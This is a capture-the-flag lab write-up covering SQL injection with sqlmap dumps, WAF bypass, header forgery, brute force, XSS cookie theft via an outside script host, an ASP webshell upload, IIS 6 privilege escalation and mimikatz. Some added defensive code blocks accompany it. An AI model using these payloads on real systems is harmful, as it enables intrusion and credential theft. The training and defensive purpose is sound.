[Fengshentai - Control Security shooting range] Yuri's Revenge: Xiaofang!
- Chapter 1: For the goddess Xiaofang! SQL injection attack principle practical exercise
- Chapter 2: Encountering obstacles! Bypass WAF filtering! SQL injection attack principle practical exercise
- Chapter 3: This background can identify the login
- Chapter 3: Brute-force the administrator account to log in to the backend: Burp, payment and brute-force practical drill
- Chapter 4: For more permissions! message board! Practical drill on cookie forgery target permissions
- Chapter 5: Attack! Get the highest authority on the Web! Bypass protection and upload Trojan horse combat drill
- Chapter 6: SYSTEM! POWER! Webshell control target actual combat exercise
- Chapter 7: GET THE PASS! Grab the administrator's clear-text password along the way
Chapter 1: For the goddess Xiaofang! SQL injection attack principle practical exercise
1. Determine whether there is a SQL injection vulnerability
?id=1'
The page no longer displays normally
?id=1 and 1=1
?id=1 and 1=2
The page output differs between the two, so there is an integer-type (numeric) injection
2. Determine the number of columns
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
order by 3 produces an error, so the number of columns is 2
3. Determine the echo point (which column is displayed on the page)
?id=1 and 1=2 union select 1,2
4. Formal injection
?id=1 and 1=2 union select 1,version()
5.5.53
?id=1 and 1=2 union select 1,database()
maoshe (the current database name)
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
admin
Query the columns
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
Id
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
username
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
password
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1
No result, so the admin table has exactly three columns: id, username, password
Query the column contents
?id=1 and 1=2 union select 1,username from admin limit 0,1
admin
?id=1 and 1=2 union select 1,username from admin limit 1,1
ppt领取微信
?id=1 and 1=2 union select 1,password from admin limit 0,1
hellohack
this is the flag
?id=1 and 1=2 union select 1,password from admin limit 1,1
zkaqbanban
Two users, two passwords
A more direct way: use group_concat
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
Id,username,password
?id=1 and 1=2 union select 1,group_concat(id,username,password) from admin
1adminhellohack,2ppt领取微信zkaqbanban
?id=1 and 1=2 union select 1,group_concat(id,0x40,username,0x3a,password) from admin
1@admin:hellohack,2@ppt领取微信:zkaqbanban
That is really all that is needed here; the remaining tables are listed for completeness
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'
paths
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'
id,content
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'
id,user,pass
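As an added illustration (not code from the original write-up), the defect behind the Chapter 1 queries beside its fix, modelled in Python on an in-memory SQLite stand-in for the maoshe database: the vulnerable handler concatenates the id parameter into the SQL, so the page's own payloads work without a quote character, while the hardened handler validates and binds it. The table contents are constructed from the values shown above, and the group_concat payload is rewritten in SQLite syntax (|| for concatenation) because SQLite lacks MySQL's multi-argument group_concat.

```python
import sqlite3

# Constructed sample data mirroring the maoshe.admin and maoshe.news tables from the write-up.
ADMIN_ROWS = [(1, "admin", "hellohack"), (2, "ppt领取微信", "zkaqbanban")]
NEWS_ROWS = [(1, "first news item"), (2, "second news item")]


def make_db():
    """In-memory SQLite stand-in for the target database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE news (id INTEGER, content TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?, ?)", ADMIN_ROWS)
    conn.executemany("INSERT INTO news VALUES (?, ?)", NEWS_ROWS)
    return conn


def news_vulnerable(conn, id_param):
    """Numeric (int-type) injection: the id parameter is concatenated into the SQL.
    There are no quotes around it, which is why the ?id=1 and 1=2 union select ...
    payloads from Chapter 1 need no quote character at all."""
    sql = "SELECT id, content FROM news WHERE id=" + id_param  # the defect
    return conn.execute(sql).fetchall()


def news_parameterized(conn, id_param):
    """Hardened handler: reject anything that is not an integer, then bind it as a
    parameter so the value can never be parsed as SQL."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, content FROM news WHERE id=?", (id_value,)).fetchall()


# The page's payloads; the group_concat one is rewritten in SQLite syntax (|| concatenation).
UNION_PASSWORD = "1 and 1=2 union select 1,password from admin limit 0,1"
UNION_DUMP = ("1 and 1=2 union select 1,"
              "group_concat(id||'@'||username||':'||password) from admin")

if __name__ == "__main__":
    db = make_db()
    print("boolean probe 1=1 :", news_vulnerable(db, "1 and 1=1"))
    print("boolean probe 1=2 :", news_vulnerable(db, "1 and 1=2"))
    print("vulnerable, dump  :", news_vulnerable(db, UNION_DUMP))
    print("parameterized     :", news_parameterized(db, UNION_DUMP))
```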
5. Automated SQL injection with sqlmap
payloads:
python sqlmap.py http://59.63.200.79:8003/?id=1
python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
Complete process:
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.4.8.10#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:23 /2020-08-16/
[17:18:26] [INFO] resuming back-end DBMS 'mysql'
[17:18:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:18:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:18:26] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:18:26 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
[*] starting @ 17:21:36 /2020-08-16/
[17:21:36] [INFO] resuming back-end DBMS 'mysql'
[17:21:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:37] [INFO] fetching database names
[17:21:37] [INFO] fetching number of databases
[17:21:37] [INFO] resumed: 3
[17:21:37] [INFO] resumed: information_schema
[17:21:37] [INFO] resumed: maoshe
[17:21:37] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] maoshe
[*] test
[17:21:37] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:37 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
[*] starting @ 17:21:55 /2020-08-16/
[17:21:55] [INFO] resuming back-end DBMS 'mysql'
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:56] [INFO] fetching tables for database: 'maoshe'
[17:21:56] [INFO] fetching number of tables for database 'maoshe'
[17:21:56] [INFO] resumed: 4
[17:21:56] [INFO] resumed: admin
[17:21:56] [INFO] resumed: dirs
[17:21:56] [INFO] resumed: news
[17:21:56] [INFO] resumed: xss
Database: maoshe
[4 tables]
+-------+
| admin |
| dirs |
| news |
| xss |
+-------+
[17:21:56] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:56 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
[*] starting @ 17:22:39 /2020-08-16/
[17:22:39] [INFO] resuming back-end DBMS 'mysql'
[17:22:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:22:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:22:39] [INFO] fetching columns for table 'admin' in database 'maoshe'
[17:22:39] [INFO] resumed: 3
[17:22:39] [INFO] resumed: Id
[17:22:39] [INFO] resumed: int(11)
[17:22:39] [INFO] resumed: username
[17:22:39] [INFO] resumed: varchar(11)
[17:22:39] [INFO] resumed: password
[17:22:39] [INFO] resumed: varchar(11)
Database: maoshe
Table: admin
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11) |
+----------+-------------+
[17:22:39] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:22:39 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
[*] starting @ 17:23:43 /2020-08-16/
[17:23:43] [INFO] resuming back-end DBMS 'mysql'
[17:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:23:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:23:43] [INFO] fetching entries of column(s) 'password, username' for table 'admin' in database 'maoshe'
[17:23:43] [INFO] fetching number of column(s) 'password, username' entries for table 'admin' in database 'maoshe'
[17:23:43] [INFO] resumed: 2
[17:23:43] [INFO] resumed: hellohack
[17:23:43] [INFO] resumed: admin
[17:23:43] [INFO] resumed: zkaqbanban
[17:23:43] [INFO] resumed: ppt领取微信
Database: maoshe
Table: admin
[2 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | hellohack |
| ppt领取微信 | zkaqbanban |
+----------+------------+
[17:23:43] [INFO] table 'maoshe.admin' dumped to CSV file 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79\dump\maoshe\admin.csv'
[17:23:43] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:23:43 /2020-08-16/
Chapter 2: Encountering obstacles! Bypass WAF filtering! SQL injection attack principle practical exercise
?id=171
?id=171 order by 10
// order by 11 errors, so there are 10 columns
id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
// blocked by the WAF
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
Use + instead of spaces to get past the WAF
Columns 2, 3, 7, 8, 9 are echoed
The admin table exists and "from admin" must be included, otherwise an error is reported
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
Account: admin
Password hash: b9a2a2b5dffb918c
The MD5 hash decrypts to: welcome
Log in to the backend at /admin
zkz{welcome-control}
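An added example (not from the original) of why the Chapter 2 WAF misses the + payload: the naive filter matches "union select" against the raw query string, where '+' is not whitespace, while the hardened filter decodes each parameter value exactly as the application will (so +, %20 and other encoded whitespace all become spaces) before matching. Keyword blocklists are only defence in depth; parameterized queries are the real fix.

```python
import re
from urllib.parse import parse_qs

# Signature for the Chapter 2 payload shape: "union select" separated by whitespace.
UNION_SELECT = re.compile(r"\bunion\s+select\b", re.IGNORECASE)


def naive_waf_blocks(raw_query_string: str) -> bool:
    """Flawed filter: matches against the raw query string as it arrived on the wire.
    '+' is not whitespace, so id=171+union+select+... slips through, as on the page."""
    return UNION_SELECT.search(raw_query_string) is not None


def decoded_parameter_values(raw_query_string: str) -> list:
    """Decode the query string the way the application will see it:
    '+' and '%20' both become spaces, other %xx sequences are decoded too."""
    params = parse_qs(raw_query_string, keep_blank_values=True)
    return [value for values in params.values() for value in values]


def normalized_waf_blocks(raw_query_string: str) -> bool:
    """Hardened filter: inspect each decoded parameter value, with runs of
    whitespace collapsed, so the '+'-for-space trick no longer hides the keyword."""
    for value in decoded_parameter_values(raw_query_string):
        collapsed = re.sub(r"\s+", " ", value)
        if UNION_SELECT.search(collapsed):
            return True
    return False


if __name__ == "__main__":
    # The exact request from Chapter 2 (constructed query string, same payload).
    evasive = "id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"
    print("naive  :", naive_waf_blocks(evasive))       # False: bypassed
    print("decoded:", normalized_waf_blocks(evasive))  # True: caught
```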
Chapter 3: This background can identify the login
- http://59.63.200.79:8004/admin/default.asp
- http://59.63.200.79:8004/admin123/
Sorry, for system security, access to this system's backend management pages from an external link address is not allowed.
The visitor's Curl(host) is:
http://59.63.200.79:81/admin123/sysadmin_view.asp
The visitor's Comeurl(referer) is:
http://59.63.200.79:8004/admin123/
- Important:
Visit admin123/sysadmin_view.asp and modify the Host and Referer headers to fake internal access (only the IP and port of the Referer need to match the IP and port of the Host).
Refresh the page; 4 requests are captured, and the last one is the one we need.
Change the port numbers to 81.
(result screenshot)
zkz{fuzz-666}
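Added example, not from the original: the backend's "internal access" check from this chapter modelled beside a check that cannot be satisfied by editing request headers. The flawed version compares the Referer's ip:port with the Host header, both of which the client sets; the hardened version ignores both and relies on the TCP peer address plus a server-side authenticated admin session. The internal network 192.168.0.0/24 and the session dict are assumptions.

```python
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Assumption: the target's own LAN, based on the 192.168.0.3 address in the Chapter 6 netstat output.
INTERNAL_NETS = [ip_network("127.0.0.0/8"), ip_network("192.168.0.0/24")]


def referer_matches_host(headers: dict) -> bool:
    """Model of the backend's check: 'internal' means the Referer's ip:port equals
    the Host header. Both headers are chosen by the client, so the check is met by
    editing two lines of an intercepted request, exactly as the write-up shows."""
    host = headers.get("Host", "")
    referer_netloc = urlsplit(headers.get("Referer", "")).netloc
    return host != "" and referer_netloc == host


def admin_access_allowed(peer_ip: str, session: dict) -> bool:
    """Hardened check: Host/Referer are ignored. Use the TCP peer address, which a
    client cannot choose on an established connection, and require a server-side
    authenticated admin session (constructed dict standing in for session storage)."""
    try:
        peer = ip_address(peer_ip)
    except ValueError:
        return False
    from_internal = any(peer in net for net in INTERNAL_NETS)
    return from_internal and session.get("role") == "admin"


if __name__ == "__main__":
    # The forged request from the write-up: Host and Referer both rewritten to port 81.
    forged = {"Host": "59.63.200.79:81",
              "Referer": "http://59.63.200.79:81/admin123/"}
    print("header check passes :", referer_matches_host(forged))              # True
    print("hardened check      :", admin_access_allowed("112.32.5.107", {}))  # False
```

Behind a reverse proxy the peer address is the proxy's, so the proxy must be the one enforcing the network restriction; the session requirement still stands.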
Chapter 3: Brute-force the administrator account to log in to the backend: Burp, payment and brute-force practical drill
http://59.63.200.79:8003/dami_zhifu/dami_baopo/index.php
http://59.63.200.79:8003/dami_zhifu/dami_baopo/admin.php
Common usernames do not exist or are disabled
Guessing the username zkaq turns out to be correct
Capture the login request in Burp and brute-force the password; look at the response length to spot the hit
The password for the account is also zkaq
flag{s_q_gjrm}
Chapter 4: For more permissions! message board! Practical drill on cookie forgery target permissions
https://xsspt.com/index.php?do=login
<script src=https://xsspt.com/nxqPZY?1597410463></script>
cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC;
flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
zkz{xsser-g00d}
Chapter 5: Attack! Get the highest authority on the Web! Bypass protection and upload Trojan horse combat drill
Tips:
1. Log in to the backend by modifying the Cookie (retyping the password is useless)
2. Upload a SHELL!
3. The flag is in the website root directory (flag.php)
4. When uploading images it is recommended to upload small files; I suggest using a QQ emoji
Yuri finally got the administrator cookie through XSS. After modifying the cookie, Yuri bypassed the password login directly and can see the backend functions! Then all that is left is to find an upload point and upload his own shell!
Capture the request in Burp and put in the cookie obtained earlier:
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
Set the cookie in the browser (Chrome or Firefox), then click "are you ready".
Server header: Microsoft-IIS/6.0
There may be IIS 6.0 parsing vulnerabilities:
- Directory parsing: files inside a folder named *.asp are executed as ASP files.
- File parsing: for *.asp;.jpg, everything after the ";" in the malformed file name is ignored, so it is executed as an *.asp file.
- Besides .asp, IIS 6.0 by default also executes these three types: *.asa, *.cer, *.cdx
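Added example (not the target application's code): a model of the two IIS 6.0 parsing quirks listed above, used to validate upload names and directories the way a hardened upload handler should. The image-extension allowlist is an assumption; the executable extensions are the ones the page names.

```python
import secrets

# Extensions IIS 6.0 executes by default, as listed on the page.
EXECUTABLE_EXTS = {"asp", "asa", "cer", "cdx"}
# Assumption: the upload feature only needs images.
ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}


def iis6_effective_extension(filename: str) -> str:
    """Model of the file-parsing quirk: IIS 6.0 cuts the name at the first ';',
    so the extension that counts is the one before it (1.asp;.jpg -> asp)."""
    prefix = filename.split(";", 1)[0]
    return prefix.rsplit(".", 1)[1].lower() if "." in prefix else ""


def would_execute(filename: str, upload_dir: str) -> bool:
    """True if IIS 6.0 would run the stored file as ASP via either quirk:
    an executable effective extension, or any path segment named *.asp."""
    segments = upload_dir.replace("\\", "/").split("/")
    directory_quirk = any(seg.lower().endswith(".asp") for seg in segments)
    return directory_quirk or iis6_effective_extension(filename) in EXECUTABLE_EXTS


def is_safe_upload(filename: str, upload_dir: str) -> bool:
    """Allowlist check a hardened upload handler applies before saving. Content
    sniffing would not help: the page's 'picture horse' is an image with script
    spliced in, so the decision has to rest on the name and the location."""
    if not filename or any(c in filename for c in (";", "/", "\\", "\x00")):
        return False
    if would_execute(filename, upload_dir):
        return False
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return ext in ALLOWED_IMAGE_EXTS


def stored_name(filename: str) -> str:
    """Discard the client's name: random basename plus the already validated
    extension, so neither the ';' trick nor a renamed .cer reaches the stored path."""
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    for name in ("1.cer", "1.asp;.jpg", "2.png"):
        verdict = stored_name(name) if is_safe_upload(name, "/UploadFiles/") else "rejected"
        print(name, "->", verdict)
```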
Look at the upload directory and the upload file restrictions
Confirm the upload directory
The same applies elsewhere; the prompt says the description was not filled in
The upload point is found
asp.php
<%eval request ("a")%>
Make an image trojan:
copy 1.php + 1.png 2.png
It doesn't seem to work if the file is too big. I used this small emoji and changed the file name to 1.cer. Isn't it cute???
Rename the file to 1.cer and upload it
It was very difficult. At the beginning, I looked for where the uploaded file was and what its name was. I couldn't upload anything all night: at first nothing uploaded at all, and then I couldn't upload the images I had made.
Redid a new one and the upload succeeded
The upload name that gets copied is the one the real upload gives you
zkz{G3t_the_admin!Sh3ll}
Chapter 6: SYSTEM! POWER! Webshell control target actual combat exercise
Tips:
1. Escalate privileges!
2. FLAG is in the root directory of Disk C!
Yuri laughed: a simple Win2003. As long as he gets SYSTEM privileges, he can show off his skills to the goddess Xiaofang...
AntSword's virtual terminal was unsuccessful: access denied.
Switched to the genuine China Chopper (菜刀), choosing asp and GB2312.
Command that appeared right on connection:
netstat -an | find "ESTABLISHED"
Then a whoami:
System error 5 has occurred.
access denied.
The virtual terminal has no authorization.
whoami
nt authority\network service
The next thing to do is
net user username password /add
but there are not enough permissions at this point,
because cmd needs to use the external wscript.shell interface.
wscript.shell is on the C drive, and we still cannot access the C drive, so use the bundled wscript.shell, which is iis6.exe.
Privilege escalation command sequence
iis6.exe "whoami"
// this exploit gives you a local SYSTEM shell (a command line with SYSTEM privileges)
iis6.exe "whoami"
// confirm identity and privileges again
iis6.exe "net user 1 1 /add"
// the added user (account 1, password 1) actually only lands in the ordinary Users group
iis6.exe "net user 1"
// view the user's information
iis6.exe "net localgroup Administrators 1 /add"
// add the user to the Administrators group
tasklist -svc // find the remote desktop service TermService, i.e. svchost.exe 2444 TermService, and note its PID
netstat -ano // use that PID to find the port number
Use the Windows built-in Remote Desktop Connection to reach the host, including the port number: ip:port.
Remote Desktop is a program that occupies a port number; that port is really the service software's port, and the ip identifies the server. To connect to the Remote Desktop service on the server, you must change the port number to the one it occupies.
You can connect directly via Win+R:
mstsc /v:IP:PORT
Or the traditional method
Make a mistake, come again
In fact, you can upload files here
Open my mind from the recycle bin in the lower right corner
Chapter 7: GET THE PASS! Grab the administrator's clear-text password along the way
After getting SYSTEM, Yuri was not satisfied. He was going to obtain the server administrator's password somehow, to collect password information for infiltration in other directions, and, by the way, to send the password to Xiaofang to show off his skills.
But he never expected that when Yuri saw the system's clear-text password... he was surprised... From then on, Yuri's life opened a new chapter.
Right-click the file, Properties, Security, Advanced; there are 5 entries, select the two Deny entries, Edit, and clear them all.
Password acquisition tool: mimikatz (just search for it)
privilege::debug ---- elevate privileges
sekurlsa::logonPasswords ---- get the logged-on users' passwords
The system seems to have been changed?
The unzip password for the package!!!
(I spent a long time on this)
wow!yougotit!
zkz{F3ck_power_3y3stem}
Full terminal output of the process:
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "net user 1 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net localgroup Administrators 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net localgroup Administrators 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[Try 2 time...]
[Try 3 time...]
[Try 4 time...]
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> tasklist -svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 284 暂缺
csrss.exe 332 暂缺
winlogon.exe 356 暂缺
services.exe 404 Eventlog, PlugPlay
lsass.exe 416 HTTPFilter, PolicyAgent, ProtectedStorage,
SamSs
svchost.exe 608 DcomLaunch
svchost.exe 672 RpcSs
svchost.exe 728 Dhcp, Dnscache
svchost.exe 756 LmHosts, W32Time
svchost.exe 792 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Schedule,
seclogon, SENS, ShellHWDetection, TrkWks,
winmgmt, wuauserv, WZCSVC
spoolsv.exe 952 Spooler
msdtc.exe 980 MSDTC
httpd.exe 1112 Apache2a
svchost.exe 1144 ERSvc
inetinfo.exe 1200 IISADMIN
mysqld.exe 1256 MySQLa
svchost.exe 1960 RemoteRegistry
VGAuthService.exe 2020 VGAuthService
vmtoolsd.exe 2064 VMTools
svchost.exe 2324 W3SVC
svchost.exe 2444 TermService
dllhost.exe 2524 COMSysApp
w3wp.exe 2900 暂缺
wmiprvse.exe 3388 暂缺
logon.scr 3256 暂缺
httpd.exe 852 暂缺
wmiprvse.exe 876 暂缺
cmd.exe 1756 暂缺
tasklist.exe 1744 暂缺
D:\05\UploadFiles\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:82 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 416
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 980
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1256
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2444
TCP 0.0.0.0:8021 0.0.0.0:0 LISTENING 1112
TCP 127.0.0.1:3306 127.0.0.1:4274 TIME_WAIT 0
TCP 192.168.0.3:82 112.32.5.107:31515 ESTABLISHED 4
TCP 192.168.0.3:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 416
UDP 0.0.0.0:1333 *:* 728
UDP 0.0.0.0:4500 *:* 416
UDP 127.0.0.1:123 *:* 756
UDP 192.168.0.3:123 *:* 756
UDP 192.168.0.3:137 *:* 4
UDP 192.168.0.3:138 *:* 4